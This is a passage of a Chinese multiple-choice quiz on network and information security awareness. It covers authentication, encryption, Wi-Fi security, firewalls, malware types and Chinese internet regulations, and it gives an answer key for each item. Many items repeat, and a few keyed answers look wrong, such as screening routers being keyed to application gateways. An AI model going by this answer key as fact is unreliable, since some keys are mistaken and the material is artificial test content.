A、 消息认证技术

B、 数据加密技术

C、 防火墙技术

D、 数字签名技术

您的答案: 标准答案: D

41、 数字信封技术能够( )

A、 对发送者和接受者的身份进行认证

B、 对发送者的身份进行认证

C、 防止交易中的抵赖发生

D、 保证数据在传输过程中的安全性

您的答案: 标准答案: D

42、 防止用户被冒名所欺骗的方法是( )。

A、 对信息源发方进行身份验证

B、 进行数据加密

C、 对访问网络的流量进行过滤和保护

D、 采用防火墙

您的答案: 标准答案: A

43、下列概念中,不能用于身份认证的手段是( )。

A、 限制地址和端口

B、 用户名和口令

C、 杀毒软

D、 智能卡

您的答案: 标准答案: C

44、利用他人的个人信息来开设银行账户进行消费,然后不予还款的行为属于( )。

A、 责任窃取

B、 个人假冒攻击

C、 借贷诈骗

D、 身份盗用

您的答案: 标准答案: D

45、提供证据表明用户身份真实性的过程称作( )。

A、 标识

B、 注册

C、 真实性验证

D、 身份认证

您的答案: 标准答案: D

46、将要输入到算法中进行加密的数据称作( )。

A、 明码电文

B、 公开文本

C、 密文

D、 明文

您的答案: 标准答案: D

47、下列关于预防网络攻击的说法正确的是( )

A、 现代服务器和 PC 操作系统具有可以信赖的默认安全设置。

B、 入侵防御系统可以记录可疑的网络活动,但在没有用户干预的情况下无法对抗正在进行的攻击。

C、 物理安全威胁的防范包括控制对设备控制台端口的访问、标识关键电缆、安装 UPS 系统以及提供温湿控制。

D、 防止网络钓鱼攻击的最好方法是采用防火墙设备。

您的答案: 标准答案: C

48、可以通过配置( )来防止用户通过多次登录尝试来猜测其他人的密码。

A、 密码策略

B、 账户锁定策略

C、 Kerberos策略

D、 审计策略

您的答案: 标准答案: B

49、PDRR一般是指信息安全保障中的( )等主要环节。

A、 策略、保护、响应、恢复

B、 加密、认证、保护、检测

C、 策略、网络攻防、密码学、备份

D、 保护、检测、响应、恢复

您的答案: 标准答案: D

50、PING命令使用ICMP的哪一种code类型:( )

A、 Redirect

B、 Echo reply

C、 Source quench

D、 Destination Unreachable

您的答案: 标准答案: B

1、如果想要限制用户过多的占用磁盘空间,应当( )

A、 设置磁盘配额

B、 设置数据压缩

C、 设置文件加密

D、 设置动态存储

您的答案: 标准答案: A

2、关于代理服务说法正确的是( )

A、 代理服务允许用户“直接”访问因特网,对用户来讲是透明的

B、 代理服务能够弥补协议本身的缺陷

C、 所有服务都可以进行代理

D、 代理服务不适合于做日志

您的答案: 标准答案: A

3、代理服务( )

A、 需要特殊硬件,大多数服务需要专用软件

B、 不需要特殊硬件,大多数服务需要专用软件

C、 需要特殊硬件,大多数服务不需要专用软件

D、 不需要特殊硬件,大多数服务不需要专用软件险

您的答案: 标准答案: B

4、 Ipsec不可以做到( )

A、 认证

B、 完整性检查

C、 加密

D、 签发证书

您的答案: 标准答案: D

5、小张经常出差,要在外地访问公司的财务信息系统,他应该采用的安全、廉价的通讯方式是( )

A、 PPP连接到公司的RAS服务器上。

B、 远程访问VPN

C、 电子邮件

D、 与财务系统的服务器PPP连接。

您的答案: 标准答案: B

6、 HTTP是( )。

A、 WWW协议

B、 文件传输协议

C、 信息浏览协议

D、 超文本传输协议

您的答案: 标准答案: D

7、SSL指的是( )

A、 加密认证协议

B、 安全套接层协议

C、 授权认证协议

D、 安全通道协议

您的答案: 标准答案: B

8、当无线路由器wifi密码安全类型为( ),最容易破解。

A、 WPA2-PSK

B、 WEP

C、 WPA-PSK

D、 WPA

您的答案: 标准答案: B

9、最低效的口令攻击类型是( )。

A、 暴力破解攻击

B、 字典攻击

C、 彩虹表攻击

D、 机器攻击

您的答案: 标准答案: A

10、无线路由器支持WEP、WPA、WPA2等方式的加密功能,它们的安全强度顺序为( )。

A、 WPA2>WPA>WEP

B、 WEP>WPA>WPA2

C、 WEP>WPA2>WPA

D、 都相同

您的答案: 标准答案: A

11、SSID(Service Set Identifier)( )。

A、 是无线网络标识符

B、 不能改变

C、 从不因任何安全原因由无线路由器发送

D、 在有线网络上必须少于4个字符

您的答案: 标准答案: A

12、试图阻止无线监听但又包含严重缺陷,现在不应再使用的标准是( )。

A、 WEP

B、 WAP-2

C、 NICW

D、 INFOMATICS

您的答案: 标准答案: A

13、保护无线网络的第一步是( )。

A、 创建用户名和口令,禁止非法用户访问无线路由器

B、 禁用无线路由器网络共享

C、 使用IP地址过滤

D、 取消非军事区

您的答案: 标准答案: A

14、将单位内部的局域网接入Internet(因特网)所需使用的接入设备是( )。

A、 防火墙

B、 集线器

C、 路由器

D、 中继转发器

您的答案: 标准答案: C

15、垃圾邮件过滤器( )。

A、 可由互联网服务提供商使用来拦截消息

B、 只能由本地电子邮件客户端使用

C、 要求同时创建黑名单和白名单

D、 只能被POP3服务器使用

您的答案: 标准答案: A

16、来自于多个攻击源而不是单一攻击源的攻击,称作( )攻击。

A、 分布式

B、 隔离

C、 脚本资源恶意软件

D、 表格资源

您的答案: 标准答案: A

17、下列哪个 IPv4 地址代表子网的广播地址( )

A、 172.16.4.129 /26

B、 172.16.4.191 /26

C、 172.16.4.51 /27

D、 172.16.4.221 /27

您的答案: 标准答案: B

18、可以被数据完整性机制防止的攻击方式是( )。

A、 假冒源地址或用户的地址欺骗攻击

B、 抵赖做过信息的递交行为

C、 数据中途被攻击者窃听获取

D、 数据在途中被攻击者篡改或破坏

您的答案: 标准答案: D

19、黑客利用IP地址进行攻击的方法有( )

A、 IP欺骗

B、 解密

C、 窃取口令

D、 发送病毒

您的答案: 标准答案: A

20、在OSI七层协议中,提供一种建立连接并有序传输数据的方法的层是( )。

A、 传输层

B、 表示层

C、 会话层

D、 应用层

您的答案: 标准答案: C

21、操作系统经常需要进行补丁升级,在进行补丁升级时通常需要管理员权限,因此在使用电脑的过程中,我们应该尽可能地使用管理员帐户登录系统进行日常操作。 ( )

A、 对

B、 错

您的答案: 标准答案: B

22、网络管理的功能有( )。

A、 性能分析和故障检测

B、 安全性管理和计费管理

C、 网络规划和配置管理

D、 以上都是

您的答案: 标准答案: D

23、如果想要限制用户过多的占用磁盘空间,应当( )。

A、 设置磁盘配额

B、 设置数据压缩

C、 设置文件加密

D、 设置动态存储

您的答案: 标准答案: A

24、在需要保护的信息资产中( )是最重要的。

A、 环境

B、 硬件

C、 数据

D、 软件

您的答案: 标准答案: C

25、让攻击者“进不来”“拿不走”“看不懂”“改不了”“走不脱”是网络信息安全建设的目的。其中,“看不懂”是指( )安全服务。

A、 数据加密

B、 身份认证

C、 数据完整性

D、 访问控制

您的答案: 标准答案: A

26、“计算机可能被盗”是( )的一个例子。

A、 漏洞利用

B、 漏洞

C、 资产

D、 风险

您的答案: 标准答案: D

27、关于临时互联网文件目录,下述说法中除( )以外都是正确的。

A、 是浏览器首先检查是否已经存储了HTML文档的位置

B、 是存储特殊加密文件的地方

C、 应该定期删除

D、 永远不应该删除

您的答案: 标准答案: D

28、除个人计算机里文件的共享功能,可以( )。

A、 将文件加密

B、 将计算机80端口封闭

C、 将计算机里的Server服务关闭

D、 将计算机里的System进程关闭

您的答案: 标准答案: C

29、小王是网管,为了监听攻击效果最好,监听设备不应放在( ) 。

A、 网关

B、 路由器

C、 中继器

D、 防火墙

您的答案: 标准答案: C

30、个人电脑中使用netstat命令查看进程识别符(PID)配合资源管理器查看是否有病毒等恶意进程与外界非法通讯,netstat命令需要配合增加的参数是( )。

A、 netstat -a

B、 netstat -s

C、 netstat -o

D、 netstat–ano

您的答案: 标准答案: D

31、下列选项中除( )以外都是社交网站成为网络攻击主要目标的原因。

A、 社交网站采用强安全措施

B、 社交网站包含私人用户信息

C、 这些网站上的用户通常容易轻信

D、 这些网站上可能找到生日、住址、工作历史等信息

您的答案: 标准答案: A

32、下列选项中,除( )以外都可能是身份盗用行为。

A、 制作假支票或借记卡,从银行账户中转走所有的钱

B、 以受害人的名字来申请破产,以逃避债务

C、 以用户的名字开设银行账户,并利用该账户开不良支票

D、 向网上银行账户系统发送蠕虫

您的答案: 标准答案: D

33、攻击者为了使恶意软件具有较长的生命周期,通常需要对其进行免杀处理。这种免杀处理主要是对抗()。

A、 特征码检测

B、 虚拟机

C、 启发式扫描

D、 主动防御

您的答案: 标准答案: A

34、( )用于描述损害用户个人信息安全的软件。

A、 间谍软件Spyware

B、 恶意软件Malware

C、 广告软件Ad ware

D、 网络操作系统Netware

您的答案: 标准答案: B

35、社会工程是指需要整个社会共同关注、共同努力、能对整个社会的产生积极影响的重大规划和项目,譬如全社会网络用户上网安全意识的培训。 ( )

A、 对

B、 错

您的答案: 标准答案: B

36、( )是攻击者安装在计算机上的程序,它篡改Web浏览器的主页和搜索引擎将其指向其它站点。

A、 IE重定位器

B、 互联网服务器重定位器

C、 IMAPI

D、 浏览器劫持软件

您的答案: 标准答案: D

37、还未公开的漏洞,称作( )漏洞?

A、 未识别攻击向量

B、 资源

C、 不确定

D、 零日

您的答案: 标准答案: D

38、用于修复软件发布之后所发现漏洞的安全更新,称作( )。

A、 密钥

B、 资源

C、 更新发布程序

D、 补丁

您的答案: 标准答案: D

39、攻击者使用( )技术在被攻击主机内存中插入一个新的“返回地址”,并使其指向包含攻击者提供的恶意代码的内存区地址。

A、 缓冲区溢出攻击

B、 木马攻击

C、 文件上传攻击

D、 蠕虫攻击

您的答案: 标准答案: A

40、下列关于超链接的说法除( )以外都是正确的。

A、 经常可以在电子邮件消息中发现

B、 他们可能显示的不是真实的链接目标

C、 已经很少使用了

D、 需要用户点击才能启动

您的答案: 标准答案: C

41、( )是指有能力带来威胁的人或事物。

A、 漏洞

B、 威胁代理

C、 漏洞利用

D、 风险因子

您的答案: 标准答案: B

42、( )操作可能会威胁到智能手机的安全性。

A、 越狱

B、 Root

C、 安装来自第三方市场的软件

D、 以上都是

您的答案: 标准答案: D

43、 将U盘插入到在公用电脑上,当电脑检测到U盘之后迅速按照正常程序卸载并弹出U盘,该操作过程是不会导致U盘中涉密文件泄密的。 ( )

A、 对

B、 错

您的答案: 标准答案: B

44、下列关于Android的描述正确的是( )。

A、 默认不支持对APP的权限进行限制,所以比iOS的安全性差

B、 默认不能安装配套市场以外的APP,但是经过用户授权后可以安装

C、 在屏幕被锁定时,默认不允许拨打任何电话号码

D、 即使被种植了木马,只要屏幕不解锁,木马也不能执行

您的答案: 标准答案: B

45、木马程序通常是恶意攻击者入侵到我们的电脑之后植入的,很少因为用户自己的原因导致木马植入。( )

A、 对

B、 错

您的答案: 标准答案: B

46、绿色上网软件可以自动过滤或屏蔽互联网上的( )保护青少年健康成长。

A、 网络游戏

B、 网络聊天信息

C、 淫秽色情信息

D、 好莱坞等电影大片

您的答案: 标准答案: C

47、数据文件不具有可执行性的特点,因此在一台干净的计算机上仅仅打开一个外来的数据文件(如Word文档、Pdf文档等)是不可能导致该计算机被感染病毒的。 ( )

A、 对

B、 错

您的答案: 标准答案: B

48、网络视频聊天相对于文字聊天而言具有较高的安全性,因为网络视频聊天是面对面的交流,是不可伪造的。但视频聊天却具有众多安全隐患,譬如可能被人录像等。( )

A、 对

B、 错

您的答案: 标准答案: B

49、“联网计算机不涉密,涉密计算机不联网”是指,计算机在上网的时候不能查看涉密信息,计算机涉密的时候不能连接互联网。( )

A、 对

B、 错

您的答案: 标准答案: B

50、对称密码系统的加密密钥和解密密钥相同,或存在简单推导关系,因此又被称为( )。

A、 单钥密码系统

B、 公/私钥密码系统

C、 公钥密码系统

D、 双钥密码系统

您的答案: 标准答案: A

1、在iPhone安装新浪微博客户端,正确的做法是( )。

A、 进入【App Store】,搜索“新浪微博”,然后安装

B、 下载“新浪微博”程序,使用数据线拷贝到iPhone上,然后安装

C、 直接将互联网上下载的“新浪微博”程序拷贝到iPhone即可

D、 以上都不对

您的答案: 标准答案: A

2、Rootkit的主要目标是( )。

A、 隐藏其存在

B、 重新格式化硬盘

C、 复制到其他计算机

D、 启动僵尸网络

您的答案: 标准答案: A

3、Cookie______。

A、 可以包含病毒

B、 行为类似蠕虫

C、 可能带来隐私风险

D、 是在Web服务器计算机上放置的小文件

您的答案: 标准答案: C

4、用于修复软件发布之后所发现漏洞的安全更新,称作______。

A、 密钥

B、 资源

C、 更新发布程序

D、 补丁

您的答案: 标准答案: D

5、秘密地将自己添加到文档或程序等宿主上,当文档被打开或程序被执行时执行的程序,称作______。

A、 病毒

B、 蠕虫

C、 Rootkit

D、 木马

您的答案: 标准答案: A

6、病毒通常修改目标程序的()字段达到获得控制权的目的。

A、 ImageBase

B、 PointerToRawData

C、 PointerToSymbleTable

D、 AddressOfEntryPoint

您的答案: 标准答案: D

7、在以下反病毒对抗技术中,________技术是目前绝大部分反病毒软件必须具备的最核心的技术之一。

A、 特征码检测

B、 启发式扫描

C、 虚拟机

D、 主动防御

您的答案: 标准答案: A

8、远程控制型木马与远程管理软件之间的最大区别在于_________。

A、 是否可以传播

B、 是否存在变种

C、 是否为独立的程序

D、 是否获得被控制端授权

您的答案: 标准答案: D

9、熊猫烧香病毒采用了捆绑式感染,其缺陷是被感染程序的图标会发生变化。如果让被感染程序的图标保持不变,则需要修改目标程序的()。

A、 代码节

B、 数据节

C、 资源节

D、 图标节

您的答案: 标准答案: C

10、中央提出要大力培育____ 的“四有”中国好网民。 1.有高度的安全意识 2.有文明的网络素养 3.有守法的行为习惯 4.有必备的防护技能 5.有文明的网络礼仪

A、 2345

B、 1234

C、 1235

D、 1345

您的答案: 标准答案: B

11、在服务器出现故障时进行接管的服务器称作______。

A、 故障保护服务器

B、 回滚服务器

C、 对称服务器集群

D、 非对称服务器集群

您的答案: 标准答案: A

12、从本质上讲,计算机病毒是一种( )。

A、 细菌

B、 文本

C、 程序

D、 微生物

您的答案: 标准答案: C

13、对社交网站上分享的内容应考虑设置“只有我的朋友”查看,这是因为______。

A、 社交网络上的朋友不可信

B、 社交网络对于谁能加入网络查看信息没有控制

C、 社交网络要求该选项

D、 攻击者不会假装成朋友

您的答案: 标准答案: B

14、《全国青少年网络文明公约》内容包括____。 1.要善于网上学习,不浏览不良信息。 2.要诚实友好交流,不侮辱欺诈他人。 3.要增强自护意识,不随意约会网友。 4.要维护网络安全,不破坏网络秩序。

A、 2345

B、 1245

C、 1235

D、 12345

您的答案: 标准答案: D

15、利用他人的个人信息来开设银行账户进行消费,然后不予还款的行为属于______

A、 责任窃取

B、 个人假冒攻击

C、 借贷诈骗

D、 身份盗用

您的答案: 标准答案: D

16、下列选项中除______以外都是社交网站成为网络攻击主要目标的原因。

A、 社交网站采用强安全措施

B、 社交网站包含私人用户信息

C、 这些网站上的用户通常容易轻信

D、 这些网站上可能找到生日、住址、工作历史等信息

您的答案: 标准答案: A

17、 根据相关规定,每年______开展国家网络安全宣传周。

A、 6月份

B、 11月份

C、 9月份第三周

D、 八月十五中秋节

您的答案: 标准答案: C

18、靠欺骗别人来获得安全敏感信息的方式被称作______。

A、 社会工程学

B、 魔法攻击

C、 暴力破解攻击

D、 诡计攻击

您的答案: 标准答案: A

19、根据《互联网上网服务营业场所管理条例》规定,中学、小学校园周围________米范围内和居民住宅楼(院)内不得设立互联网上网服务营业场所。

A、 200

B、 300

C、 500

D、 1000

您的答案: 标准答案: A

20、《互联网上网服务营业场所管理条例》规定,互联网上网服务营业场所经营单位____。

A、 可以接纳未成年人进入营业场所

B、 可以在成年人陪同下,接纳未成年人进入营业场所

C、 不得接纳未成年人进入营业场所

D、 可以在白天接纳未成年人进入营业场所

您的答案: 标准答案: C

21、遇到不良信息,可以到下列选项中除________以外的网站进行举报。

A、 12321.cn,电话12321

B、 12377.cn,电话12377

C、 www.shdf.gov.cn,电话12390

D、 12306.cn,电话12306

您的答案: 标准答案: D

22、列选项中不属于垃圾邮件过滤技术的是______。

A、 软件模拟技术

B、 贝叶斯过滤技术

C、 关键字过滤技术

D、 黑名单技术

您的答案: 标准答案: A

23、 对于通过邮件发送的“连环信”,应该______。

A、 如果是有关病毒的预防信息,应转发给尽可能多的人

B、 只转发给朋友

C、 检查真实性之后再转发

D、 按照处理纸质垃圾信件的方式丢弃

您的答案: 标准答案: D

24、对于通过邮件发送的“连环信”,应该______。

A、 如果是有关病毒的预防信息,应转发给尽可能多的人

B、 只转发给朋友

C、 检查真实性之后再转发

D、 按照处理纸质垃圾信件的方式丢弃

您的答案: 标准答案: D

25、将要输入到算法中进行加密的数据称作______。

A、 明码电文

B、 公开文本

C、 密文

D、 明文

您的答案: 标准答案: D

26、对称密码系统的加密密钥和解密密钥相同,或存在简单推导关系,因此又被称为______。

A、 单钥密码系统

B、 公/私钥密码系统

C、 公钥密码系统

D、 双钥密码系统

您的答案: 标准答案: A

27、撞库得手的原因是______。

A、 用户扫描不安全的二维码

B、 用户为图省事,在许多网站设置相同的用户名和口令

C、 用户电脑被植入木马

D、 用户连接不安全的无线网络导致

您的答案: 标准答案: B

28、在Windows系统中下列账户不是合法账户的是______

A、 abcABC

B、 abc_123

C、 abc123$

D、 abc123*

您的答案: 标准答案: D

29、______是位于安全网络边界之外的一个隔离网络。

A、 非军事区

B、 端口复制区

C、 安全网络环境

D、 防火墙沙盒

您的答案: 标准答案: A

30、网络礼仪的黄金规则是______。

A、 记住人的存在

B、 永远不惹怒朋友

C、 遵守所有其它的网络礼仪规则

D、 每条消息都包含一个笑脸

您的答案: 标准答案: A

31、根据相关规定,每年______开展国家网络安全宣传周。

A、 6月份

B、 11月份

C、 9月份第三周

D、 八月十五中秋节

您的答案: 标准答案: C

32、国家级网络安全青少年科普基地位于 ______。

A、 中国科技馆

B、 国家图书馆

C、 西单电影院

D、 首都博物馆

您的答案: 标准答案: A

33、《互联网上网服务营业场所管理条例》规定,互联网上网服务营业场所经营单位____。

A、 可以接纳未成年人进入营业场所

B、 可以在成年人陪同下,接纳未成年人进入营业场所

C、 不得接纳未成年人进入营业场所

D、 可以在白天接纳未成年人进入营业场所

您的答案: 标准答案: C

34、遇到不良信息,可以到下列选项中除________以外的网站进行举报

A、 12321.cn,电话12321

B、 12377.cn,电话12377

C、 www.shdf.gov.cn,电话12390

D、 12306.cn,电话12306

您的答案: 标准答案: D

35、《文明上网自律公约》内容包括________。 ①自觉遵纪守法,倡导社会公德,促进绿色网络建设; ②提倡自主创新,摒弃盗版剽窃,促进网络应用繁荣; ③提倡诚实守信,摒弃弄虚作假,促进网络安全可信; ④提倡人人受益,消除数字鸿沟,促进信息资源共享。

A、 ②③④

B、 ①②④

C、 ①②③

D、 ①②③④

您的答案: 标准答案: D

36、《全国青少年网络文明公约》内容包括____。 ①要善于网上学习,不浏览不良信息。 ②要诚实友好交流,不侮辱欺诈他人。 ③要增强自护意识,不随意约会网友。 ④要维护网络安全,不破坏网络秩序。 ○5要有益身心健康,不沉溺虚拟时空。

A、 2345

B、 1245

C、 1235

D、 12345

您的答案: 标准答案: D

37、中央提出要大力培育____ 的“四有”中国好网民。 ○1有高度的安全意识 ○2有文明的网络素养 ○3有守法的行为习惯 ○4有必备的防护技能 ○5有文明的网络礼仪

A、 2345

B、 1234

C、 1235

D、 1345

您的答案: 标准答案: B

38、计算机网络按威胁对象大体可分为两种:一是对网络中信息的威胁; 二是______

A、 人为破坏

B、 对网络中设备的威胁

C、 病毒威胁

D、 对网络人员的威胁

您的答案: 标准答案: B

39、Windows系统中“net share”命令的作用是( )

A、 查看本机的共享资源

B、 创建本机的共享资源

C、 删除本机的共享资源

D、 查看局域网内其他主机的共享资源

您的答案: 标准答案: A

40、当安装完Windows操作系统后,在系统盘里会出现“pagefile.sys”隐藏文件,且文件占用空间较大,此文件的作用是(

A、 物理内存

B、 EPROM

C、 ROM

D、 虚拟内存

您的答案: 标准答案: D

41、个人移动终端的数据保护策略,除了数据加密还有( )

A、 移动终端的数据备份与还原

B、 使用安全的无线接入点

C、 关闭WLAN功能,开启3G/4G功能

D、 不要使自己的移动终端成为WiFi热点

您的答案: 标准答案: A

42、 有一些信息安全事件是由于信息系统中多个部分共同作用造成的,人们称这类事件为“多组件事故”,应对这类安全事件最有效的方法是( )

A、 配置网络入侵检测系统以检测某些类型的违法或误用行为

B、 使用防病毒软件,并且保持更新为最新的病毒特征码

C、 将所有公共访问的服务放在网络非军事区(DMZ)

D、 使用集中的日志审计工具和事件关联分析软件

您的答案: 标准答案: D

43、从加密类型分析,当无线路由器WIFI密码安全类型为______时,最容易破解

A、 WPA2-PSK

B、 WEP

C、 WPA-PSK

D、 WPA

您的答案: 标准答案: B

44、WPA2的目的是______。

A、 通过经常修改口令来锁住无线路由器

B、 限制下载量

C、 限制用户传输量

D、 加密传输

您的答案: 标准答案: D

45、SSL协议要求建立在______协议之上。

A、 HTTP

B、 IP

C、 TCP

D、 SMTP

您的答案: 标准答案: C

46、 单位内部做的路由表中元素不包含( )

A、 源IP地址

B、 目的IP地址

C、 子网掩码

D、 下一跳地址

您的答案: 标准答案: A

47、某客户端采用ping命令检测网络连接故障时,发现可以ping通127.0.0.1及本机的IP地址,但无法ping通同一网段内其他工作正常的计算机的IP地址。该客户端的故障可能是( )

A、 TCP/IP协议不能正常工作

B、 本机网卡不能正常工作

C、 本机网络接口故障

D、 DNS服务器地址设置错误

您的答案: 标准答案: C

48、公司需要使用域控制器来管理,安装域控制器须具备

A、 操作系统版本是Windows server2008或者Windows XP

B、 本地磁盘至少有一个NTFS分区

C、 本地磁盘必须全部是NTFS分区

D、 有相应的DNS服务器支持

您的答案: 标准答案: B

49、为了降低分析,不建议使用的Internet服务是(

A、 web服务

B、 外部访问内部系统

C、 内部访问Internet

D、 FTP服务

您的答案: 标准答案: D

50、代理服务是指______

A、 需要特殊硬件,大多数服务需要专用软件

B、 不需要特殊硬件,大多数服务需要专用软件

C、 需要特殊硬件,大多数服务不需要专用软件

D、 不需要特殊硬件,大多数服务不需要专用软件险

您的答案: 标准答案: B

1、关于代理服务说法正确的是______

A、 代理服务允许用户“直接”访问因特网,对用户来讲是透明的

B、 代理服务能够弥补协议本身的缺陷

C、 所有服务都可以进行代理

D、 代理服务不适合于做日志

您的答案: 标准答案: A

2、下述关于IPv6论述中不正确的是( )

A、 IPV6具有高效IP包头

B、 IPV6增强了安全性

C、 IPV6地址采用64位

D、 IPV6采用主机地址自动配置

您的答案: 标准答案: C

3、IPSec不可以做到( )

A、 认证

B、 完整性检查

C、 加密

D、 签发证书

您的答案: 标准答案: D

4、网络地址转换(Network Address Translation,NAT)______。

A、 仅能被用于大型企业网络

B、 因为太复杂所以不能被用于无线网络

C、 将网络设备的地址对攻击者隐藏

D、 提供有限安全性并且已被MAC地址过滤取代

您的答案: 标准答案: C

5、_____是一个预先定义的电子邮件地址列表,用户可以接收来自该列表中地址的邮件。

A、 僵尸网络

B、 黑名单blacklist

C、 白名单whitelist

D、 干净列表

您的答案: 标准答案: C

6、 硬件防火墙常见的性能参数不包含( )

A、 吞吐量

B、 最大并发连接数

C、 每秒新建会话连接数

D、 背板带宽

您的答案: 标准答案: D

7、 通常硬件防火墙设备不包含哪种物理接口( )

A、 以太网电口

B、 SFP/GBIC光接口

C、 Console口

D、 AUX接口

您的答案: 标准答案: D

8、在一个新组建的运行正常的网络中,如果只允许内网的某些客户可以访问互联网,内网的某些服务器可以被互联网上的用户访问,要在网络中再次部署哪种设备( )

A、 防病毒过滤网关

B、 IDS

C、 流量控制设备

D、 防火墙

您的答案: 标准答案: D

9、下列说法中,关于包过滤防火墙和应用层代理防火墙的描述错误的是______。

A、 包过滤防火墙必须和路由器在同一个设备中实现才能够保障安全

B、 应用层代理防火墙能使内网用户访问常用网站的速度加快

C、 包过滤通常在传输层以下实现,应用层代理通常在会话层以上实现

D、 应用层代理防火墙能够提供用户认证

您的答案: 标准答案: A

10、硬件防火墙常见的性能参数不包含______

A、 吞吐量

B、 最大并发连接数

C、 每秒新建会话连接数

D、 背板带宽

您的答案: 标准答案: D

11、屏蔽路由器型防火墙采用的技术是基于( )

A、 数据包过滤技术

B、 应用网关技术

C、 代理服务技术

D、 三种技术的结合

您的答案: 标准答案: B

12、______可在分组到达网络边界时进行过滤,从而压制网络攻击。

A、 网卡适配器

B、 路由器

C、 防火墙

D、 网络连接存储NAS

您的答案: 标准答案: C

13、当发现网页被篡改或信息系统主机已被入侵,应首先( )

A、 将被攻击设备从网络中隔离出来

B、 立即向信息系统主管部门负责人报告

C、 查看利用了哪些漏洞实施的攻击

D、 立即恢复信息系统的正常使用

您的答案: 标准答案: A

14、小王是公司的网络管理员,为了监听络中存在的攻击,达到最好的监听,监听设备不应放在______

A、 网关

B、 路由器

C、 中继器

D、 防火墙

您的答案: 标准答案: C

15、拒绝服务攻击可能造成的危害______

A、 提升权限

B、 导致系统服务不可用

C、 进行挂马

D、 植入病毒

您的答案: 标准答案: B

16、入侵检测系统在进行信号分析时,一般通过三种常用的技术手段,以下哪一种不属于通常的三种技术手段( )

A、 模式匹配

B、 统计分析

C、 完整性分析

D、 密文分析

您的答案: 标准答案: D

17、 基于网络的入侵检测系统的信息源是( )

A、 系统的审计日志

B、 系统的行为数据

C、 应用程序的事务日志文件

D、 网络中的数据包

您的答案: 标准答案: D

18、以下选项中,()不属于访问控制范畴。

A、 强制

B、 自主

C、 文件按名访问

D、 基于角色

您的答案: 标准答案: C

19、PDRR一般是指信息安全保障中的____等主要环节。

A、 策略、保护、响应、恢复

B、 加密、认证、保护、检测

C、 策略、网络攻防、密码学、备份

D、 保护、检测、响应、恢复

您的答案: 标准答案: D

20、公司为了防范内部攻击,下列选项哪个是最好的实施控制措施( )

A、 确保有全面的攻击事件响应计划

B、 为重要系统记录所有的用户活动

C、 对所有的员工或承包商进行犯罪背景检查

D、 根据个人工作职责需要限制访问权

您的答案: 标准答案: D

21、 Windows紧急修复盘不能修复下列哪个项目( )

A、 硬件兼容问题

B、 分区引导扇区

C、 启动环境

D、 系统文件

您的答案: 标准答案: A

22、匿名登录FTP服务器使用的账户名是(

A、 anyone

B、 anonymous

C、 everone

D、 guest

您的答案: 标准答案: B

23、在Windows系统中下列账户不是合法账户的是

A、 abcABC

B、 abc_123

C、 abc123$

D、 abc123*

您的答案: 标准答案: D

24、在设置域账户属性时,( )项策略是不能被设置的

A、 账户登录时间

B、 账户个人信息

C、 账户的权限

D、 指定账户登录域的计算机

您的答案: 标准答案: C

25、Windows系统中权限最高为

A、 administrators

B、 power users

C、 guests

D、 system

您的答案: 标准答案: D

26、 对于企业网络中划分的DMZ区域而言,正确的是( )

A、 DMZ是一个真正可信的网络部分

B、 DMZ网络访问控制策略决定允许或禁止进入DMZ通信

C、 允许外部用户访问DMZ系统上合适的服务

D、 以上三项都是

您的答案: 标准答案: D

27、当用户登录自己电脑时显示错误信息“ 网络中存在重名”,登录后应该( )

A、 打开控制面板中的“系统”工具,修改网络标识中的计算机名

B、 打开“本地连接”属性对话框,修改IP地址

C、 打开管理工具的“本地用户和组”,修改用户名

D、 需要重新安装操作系统

您的答案: 标准答案: A

28、公司为了防范内部攻击,下列选项哪个是最好的实施控制措施______

A、 确保有全面的攻击事件响应计划

B、 为重要系统记录所有的用户活动

C、 对所有的员工或承包商进行犯罪背景检查

D、 根据个人工作职责需要限制访问权

您的答案: 标准答案: D

29、Windows系统中权限最高为______

A、 administrators

B、 power users

C、 guests

D、 system

您的答案: 标准答案: D

30、在Linux系统中,修改口令策略和查看某个用户的口令策略分别是对如下哪两个文件进行操作( )

A、 /etc/login.defs和/etc/shadow

B、 /etc/login.defs和/etc/passwd

C、 /etc/passwd和/etc/shadow

D、 /etc/shadow和/etc/login

您的答案: 标准答案: A

31、可以通过配置_____来防止用户通过多次登录尝试来猜测其他人的密码

A、 密码策略

B、 账户锁定策略

C、 Kerberos策略

D、 审计策略

您的答案: 标准答案: B

32、无线局域网网络标准IEEE802.11的用户认证机制有( )

A、 Open key

B、 Pre-Shared Key authentication

C、 Shared Key authentication

D、 MAC authentication

您的答案: 标准答案: C

33、通过计算机网络给乙发消息,说其同意签定合同。随后甲反悔,不承认发过该条消息。为了防止这种情况发生,应在计算机网络中采用______。

A、 消息认证技术

B、 数据加密技术

C、 防火墙技术

D、 数字签名技术

您的答案: 标准答案: D

34、防止用户被冒名所欺骗的方法是______

A、 对信息源发方进行身份验证

B、 进行数据加密

C、 对访问网络的流量进行过滤和保护

D、 采用防火墙

您的答案: 标准答案: A

35、提供证据表明用户身份真实性的过程称作______。

A、 标识

B、 注册

C、 真实性验证

D、 身份认证

您的答案: 标准答案: D

36、可以被数据完整性机制防止的攻击方式是______

A、 假冒源地址或用户的地址欺骗攻击;

B、 抵赖做过信息的递交行为;

C、 数据中途被攻击者窃听获取;

D、 数据在途中被攻击者篡改或破坏

您的答案: 标准答案: D

37、下列概念中,不能用于身份认证的手段是______。

A、 限制地址和端口

B、 用户名和口令

C、 杀毒软件

D、 智能卡

您的答案: 标准答案: C

38、在一个信息系统的多级密钥体系中,主密钥应该以()形式存在于()中

A、 明文 开放环境

B、 密文 开放环境

C、 明文 安全环境

D、 密文 安全环境

您的答案: 标准答案: C

39、______的概念不完全属于安全范畴。

A、 可用性,机密性,权力分散

B、 匿名性,可生存性,入侵容忍

C、 可审查性,兼容性,防抵赖

D、 完整性,可仲裁性,抗监听

您的答案: 标准答案: C

40、下列选项中,与人机安全交互无关的是______。

A、 情绪和思维

B、 有线网和无线网

C、 声音和视频

D、 手势和表情

您的答案: 标准答案: B

41、近期有曝光,黑客可利用部分显示设备固件缺陷,修改显示信息,这破坏了信息安全的()属性

A、 机密性

B、 完整性

C、 不可否认性

D、 可用性

您的答案: 标准答案: B

42、CIA三元组指的是______。

A、 机密性,完整性,可用性

B、 真实性,完整性,可控性

C、 机密性,真实性,可用性

D、 完整性,可用性,可控性

您的答案: 标准答案: A

43、当文件长度小于500字节时,NTFS把该文件存放在_________。

A、 单独的簇中

B、 文件目录区

C、 MFT中FR中

D、 文件的索引区

您的答案: 标准答案: C

44、为了便于磁盘管理,常把磁盘分为单个的小分区,把这些分区组织起来的结构为_______。

A、 B+树

B、 单向链表

C、 双向链表

D、 队列

